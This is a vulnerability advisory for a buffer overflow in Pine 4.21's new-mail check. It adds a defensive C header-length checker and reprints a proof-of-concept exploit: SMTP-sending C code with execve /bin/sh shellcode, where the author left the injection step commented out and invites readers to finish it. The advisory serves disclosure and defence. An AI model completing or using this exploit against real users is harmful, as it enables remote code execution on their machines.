Security Vulnerability
Pine 4.21 Buffer Overflow Vulnerability

Published: 2000-09-26
Updated: 2000-09-26

Affected systems:

University of Washington Pine 4.21
Description:

Pine 4.21 has a buffer overflow in the code that periodically checks for new mail while Pine is running. An attacker can send a message containing overflow code to the host on which the targeted user's mailbox resides; when that user checks mail with "Ctrl-L", arbitrary code chosen by the attacker may be executed.
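As an added example (not Pine's code and not part of the original advisory), the C below shows the defensive counterpart of the pattern behind the strcpy() frames in the crash trace: a small header parser that locates the From: value of a raw message and refuses to copy it when it would not fit a fixed-size buffer, plus a scan that counts header lines longer than a limit, which a mail administrator can use to flag such messages before they reach the client. The buffer size FROM_MAX, the sample message and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */

/* Assumed fixed-size destination for a From: value (Pine's real size is
 * not given in the advisory). */
#define FROM_MAX 256
/* RFC 5322 line-length limit, used as the generic sanity bound. */
#define LINE_MAX_822 998

/* Find the value of header `name` (case-insensitive, at line start) in a
 * raw message; headers end at the first empty line. Folded continuation
 * lines are ignored here for brevity. Returns NULL when absent. */
const char *find_header(const char *msg, const char *name, size_t *vlen)
{
    size_t nlen = strlen(name);
    const char *p = msg;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len && p[len - 1] == '\r') len--;
        if (len == 0) break;                      /* end of headers */
        if (len > nlen && strncasecmp(p, name, nlen) == 0 && p[nlen] == ':') {
            const char *v = p + nlen + 1;
            while (v < p + len && (*v == ' ' || *v == '\t')) v++;
            *vlen = (size_t)(p + len - v);
            return v;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return NULL;
}

/* Bounded replacement for an unchecked strcpy() of the From: value:
 * 0 = copied, -1 = no From: header, -2 = value would overflow dst, so the
 * caller must reject the message instead of truncating silently. */
int extract_from_safe(const char *msg, char dst[FROM_MAX])
{
    size_t vlen;
    const char *v = find_header(msg, "From", &vlen);
    if (!v) return -1;
    if (vlen >= FROM_MAX) return -2;
    memcpy(dst, v, vlen);
    dst[vlen] = '\0';
    return 0;
}

/* Detection-side check: count logical header lines (folded continuations
 * added to the line they belong to) longer than `limit` bytes. */
int count_oversized_headers(const char *msg, size_t limit)
{
    int count = 0;
    size_t cur = 0;
    const char *p = msg;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len && p[len - 1] == '\r') len--;
        if (len == 0) break;                      /* end of headers */
        if (p[0] == ' ' || p[0] == '\t') {
            cur += len;                           /* continuation line */
        } else {
            if (cur > limit) count++;
            cur = len;
        }
        if (!eol) break;
        p = eol + 1;
    }
    if (cur > limit) count++;
    return count;
}

/* Constructed sample: a short message whose From: value starts with
 * `from_len` bytes of 'A', the shape of the payload the advisory shows. */
int build_sample(char *out, size_t cap, size_t from_len)
{
    int n = snprintf(out, cap, "Received: from a.example by b.example\r\nFrom: ");
    if (n < 0 || (size_t)n + from_len + 64 >= cap) return -1;
    memset(out + n, 'A', from_len);
    n += (int)from_len;
    snprintf(out + n, cap - (size_t)n, " test@test.net\r\nSubject: hi\r\n\r\nbody\r\n");
    return 0;
}

int main(void)
{
    char msg[4096], from[FROM_MAX];
    if (build_sample(msg, sizeof msg, 700) != 0) return 1;
    printf("headers over %d bytes: %d\n", FROM_MAX,
           count_oversized_headers(msg, FROM_MAX));
    printf("headers over %d bytes: %d\n", LINE_MAX_822,
           count_oversized_headers(msg, LINE_MAX_822));
    printf("extract_from_safe -> %d (expect -2: rejected)\n",
           extract_from_safe(msg, from));
    return 0;
}
```

Note that a 700-byte filler stays under the RFC 5322 line limit, so a scan that only enforces the generic 998-byte bound would not flag it; the limit that matters is the size of the buffer the client copies the value into, which is why extract_from_safe rejects on FROM_MAX rather than on the line length.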

<* Source: Arkane (arkane@speakeasy.org) *>



Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

/*############## ##### ###### ## # ##       #  # # #  #            #
#                                     #
#       PINE Exploit 4.21 [ bTm    ]                   #
#                                            #

      Proof of Concept: Pine 4.21

     There exists a vulnerability in Pine 4.21 involving the
     portion of code in charge of periodically checking email
     when a pine client is open.

     Run pine in one window, then send an email to the account
     owning that session. Switch back over and hit [Control+L]
     (to check your mail).

     Woohoo!

     now open the core up in gdb:

     #2  0x40084098 in abort () at ../sysdeps/generic/abort.c:139
     #3  0x817470c in strcpy () at ../sysdeps/generic/strcpy.c:43
     #4  0x8137f82 in strcpy () at ../sysdeps/generic/strcpy.c:43
     #5  0x8158760 in strcpy () at ../sysdeps/generic/strcpy.c:43
     #6  0x40082c28 in __restore ()
              at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
     #7  0xe7e2bfff in ?? ()
           Cannot access memory at address 0xe7e2bfff.

     Oops, my alignment could use some work.


    Hello's : Mega,Loki,Lamagra,and zen-parse.


    BTW: this is broken, you have to figure it out on your own how
         to smuggle the shellcode in.

    Any real Pentester can get this working fairly quickly.

    Just be polite, don't forget to say HELO!



            Arkane [bTm]

######### ### # ##  # # ## # # ## # # # #       #  #  #   ###   ## ##  */



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>

/* Returns the current stack pointer via inline asm (only reliable at -O0);
 * unused below, since the author hard-codes the address instead. */
unsigned long get_sp (void)
{
  __asm__ ("mov %esp, %eax");
}

#define ADDRLEN 700
#define EXECLEN 1000
#define NOP    0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main (int argc, char **argv)
{
  struct sockaddr_in server;
  struct hostent *hp;
  int s;
  char helo[100];
  char mail[100];
  char rcpt[100];
  char data[2500];
  char start[20];

  int offset = 0;
  unsigned long addr;
  int i;
  char *addrs, *exec;

  addrs = (char *) malloc (ADDRLEN);
  exec  = (char *) malloc (EXECLEN);

  if (argc < 2)
    {
      printf ("   Usage: %s <Email Address> <offset>\n", argv[0]);
      printf ("                                            \n\n");
      exit (0);
    }

  if (argc == 3)
    offset = atoi (argv[2]);

  //addr = get_sp () - offset;

  addr = 0xbfffe7e2; //RH62

  /* Fill the From: filler buffer with 'A' bytes. */
  memset (addrs, 0x41, ADDRLEN);

  /* Left disabled by the author (see the header comment). */
  //  for (i = 0; i < ADDRLEN ; i += 4)
  //   *(unsigned *) &addrs[i] = addr;

  //  memset(exec,0x90,EXECLEN);

  //  memset(addrs+195,0x90,5);

  //  memcpy (addrs + 200, shellcode, strlen (shellcode));

  if ((hp = gethostbyname ("mail.speakeasy.org")) == NULL) {
    printf ("Could not resolve mail.speakeasy.org.\n");
    exit (1);
  }

  if ((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    printf ("Error");
    exit (1);
  }

  server.sin_family = AF_INET;
  server.sin_port = htons (25);
  server.sin_addr.s_addr = *(u_long *) hp->h_addr;
  bzero (&(server.sin_zero), 8);

  if (connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) {
    printf ("Connection refused\n");
    exit (1);
  }

  /* Plain SMTP envelope: HELO, MAIL FROM, RCPT TO, DATA. */
  sprintf (helo, "helo test\r\n");
  sprintf (mail, "mail from: %s\r\n", argv[1]);

  send (s, helo, strlen (helo), 0);
  send (s, mail, strlen (mail), 0);

  sprintf (rcpt, "rcpt to: %s\r\n", argv[1]);

  send (s, rcpt, strlen (rcpt), 0);

  sprintf (start, "data\r\n");

  send (s, start, strlen (start), 0);

  fprintf (stderr, " Message Sent! \n");

  /* Message: the oversized From: header, the exec buffer as body,
   * the end-of-data marker and QUIT. */
  sprintf (data, "From: %s AAAAAAAA test@test.net\r\n%s\r\n.\r\nquit\r\n", addrs, exec);
  send (s, data, strlen (data), 0);

  close (s);
  exit (0);
}

Recommendation:

Temporary workaround:

    NSFOCUS recommends that you stop using Pine's automatic mail-checking feature until a vendor patch is available.

Vendor patch:

    None yet.

This vulnerability report was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.